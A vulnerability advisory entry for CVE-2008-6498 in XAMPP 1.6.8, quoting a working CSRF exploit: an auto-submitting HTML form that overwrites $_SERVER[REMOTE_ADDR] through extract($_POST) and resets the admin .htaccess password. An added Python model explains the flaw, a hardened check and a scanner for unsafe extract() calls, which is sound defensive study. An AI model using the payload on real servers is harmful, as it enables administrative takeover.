Apachefriends XAMPP 'security/xamppsecurity.php' multiple cross-site scripting vulnerabilities

Vulnerability ID: 1116978    Vulnerability type: Cross-site request forgery
Published: 2008-12-08    Updated: 2009-03-27
CVE ID: CVE-2008-6498    CNNVD ID: CNNVD-200903-335
Platform: Windows    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/7384
https://www.securityfocus.com/bid/31472
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-335
|Vulnerability details
XAMPP is an easy-to-install Apache web server distribution (bundling MySQL, PHP, Perl, an FTP server and phpMyAdmin) that supports several operating systems, including Linux, Solaris, Windows and Mac OS X. A cross-site request forgery vulnerability exists in security/xamppsecurity.php in XAMPP 1.6.8. Remote attackers can hijack the authentication of users for requests that change an .htaccess password via the xampppasswd parameter.
|Vulnerability EXP
XAMPP change administrative password:
--------------------------------------------------------------------------------
Written by Michael Brooks
special thanks to str0ke

Affects XAMPP 1.6.8.
homepage: http://www.apachefriends.org/
XAMPP has 17+ million downloads from sourceforge.net.
register_globals=On or Off
This attack is exploitable even when this page is reporting a fully
secure system: http://10.1.1.10/security/index.php

There are two vulnerabilities that are being used together.
1) Global variable manipulation to spoof ip address.
2) XSRF to change the .htaccess password for http://10.1.1.10/security/
 and http://10.1.1.10/xampp/ .

The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and
this cannot normally be spoofed.
However extract($_POST); can be used to overwrite any declared
variable, including the $_SERVER superglobal. This can be used to
"spoof" your ip address as 127.0.0.1
This xsrf attack can be exploited from a browser at any ip address, so
long as that browser is currently authenticated.

This vulnerable code is from the very top of: /security/xamppsecurity.php
<?php
       error_reporting(0);
       extract($_POST);
       extract($_SERVER);
       $host = "127.0.0.1";
       $timeout = "1";

       if ($REMOTE_ADDR) {
               if ($REMOTE_ADDR != $host) {
                       echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
                       exit;
               }
       }
//...

//Start of xsrf attack
<html>
	<form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>
	          <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
		<input type=hidden name="xamppuser" value=admin >
		<input type=hidden name="xampppasswd" value=password>
		<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
		<input type=submit>
	</form>
</html>
<script>
	document.getElementById(1).submit();
</script>
//End of xsrf attack

# milw0rm.com [2008-12-08]
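The advisory's core point is an ordering problem: extract($_POST) runs before extract($_SERVER), so a request body can replace the $_SERVER array that the access check later reads from. The following Python model is an added example, not code from the advisory or from XAMPP. It uses dicts in place of PHP arrays to reproduce the shadowing the advisory describes, then shows the same check done safely (peer address read only from the server-provided array, plus a per-session CSRF token), and ends with a small source scanner a defender can run over PHP code to find the extract($_POST)-style pattern. All request data, session token values and the PHP snippet are constructed for the example.

```python
"""Model of the trust flaw in security/xamppsecurity.php (added example).

PHP builds a nested array from a form field named _SERVER[REMOTE_ADDR], so
the PoC's hidden input arrives as $_POST['_SERVER']['REMOTE_ADDR'].  The
nested dict below reproduces that shape.  All values are constructed.
"""
import hmac
import re

TRUSTED_HOST = "127.0.0.1"   # same constant as $host in the vulnerable script

# Constructed sample input: what Apache really saw on the socket, and the
# POST body shape used by the advisory's PoC form.
SERVER_ENV = {"REMOTE_ADDR": "203.0.113.5"}
SPOOFED_POST = {
    "_SERVER": {"REMOTE_ADDR": "127.0.0.1"},
    "xamppuser": "admin",
    "xampppasswd": "password",
    "xamppaccess": "Make safe the XAMPP directory",
}


def php_extract(namespace: dict, source: dict) -> None:
    """Model of PHP extract() with its default EXTR_OVERWRITE behaviour:
    every key of `source` becomes a variable, replacing any existing one."""
    namespace.update(source)


def vulnerable_check(post: dict, server: dict) -> bool:
    """Mirrors the statement order at the top of xamppsecurity.php.

    extract($_POST) runs first, so a POST key named _SERVER replaces the
    server array; extract($_SERVER) then defines $REMOTE_ADDR from the
    attacker-supplied copy.  Returns True when the script would proceed.
    """
    ns = {"_POST": post, "_SERVER": server}
    php_extract(ns, ns["_POST"])      # may overwrite ns["_SERVER"]
    php_extract(ns, ns["_SERVER"])    # $REMOTE_ADDR now comes from that copy
    remote_addr = ns.get("REMOTE_ADDR")
    # The original only compares when $REMOTE_ADDR is set; modelled as-is.
    if remote_addr:
        return remote_addr == TRUSTED_HOST
    return True


def hardened_check(post: dict, server: dict, session_token: str) -> bool:
    """Safe form of the same gate.

    The peer address is read only from the server-provided array, never
    from request data, and the request must carry the CSRF token bound to
    the authenticated session, so a third-party page cannot drive an
    already-logged-in browser through this endpoint.  `session_token` and
    the `csrf_token` field name are assumptions of this example.
    """
    remote_addr = server.get("REMOTE_ADDR", "")
    if remote_addr != TRUSTED_HOST:
        return False
    supplied = post.get("csrf_token", "")
    return hmac.compare_digest(supplied, session_token)


# Audit helper: flag extract() calls fed directly from request superglobals.
UNSAFE_EXTRACT = re.compile(r"\bextract\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")


def find_unsafe_extract(php_source: str) -> list:
    """Return (line number, stripped line) for each request-driven extract()."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if UNSAFE_EXTRACT.search(line):
            hits.append((lineno, line.strip()))
    return hits


# Constructed snippet in the shape of the advisory's quoted code.
PHP_SNIPPET = """<?php
error_reporting(0);
extract($_POST);
extract($_SERVER);
$host = "127.0.0.1";
"""

if __name__ == "__main__":
    print("vulnerable gate, spoofed body :", vulnerable_check(SPOOFED_POST, SERVER_ENV))
    print("hardened gate, spoofed body   :", hardened_check(SPOOFED_POST, SERVER_ENV, "s3ss10n"))
    print("audit hits                    :", find_unsafe_extract(PHP_SNIPPET))
```

Running the file shows the vulnerable gate accepting a request whose real peer address is 203.0.113.5, the hardened gate rejecting it, and the scanner reporting line 3 of the constructed snippet while leaving extract($_SERVER) alone (that call is only dangerous because of what ran before it, which is exactly what the scanner's hit points a reviewer at).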
|Affected products
XAMPP XAMPP Windows 1.6.8
|References

Source: XF
Name: xampp-xamppsecurity-csrf(47201)
Link: http://xforce.iss.net/xforce/xfdb/47201
Source: MILW0RM
Name: 7384
Link: http://www.milw0rm.com/exploits/7384
Source: SECUNIA
Name: 32134
Link: http://secunia.com/advisories/32134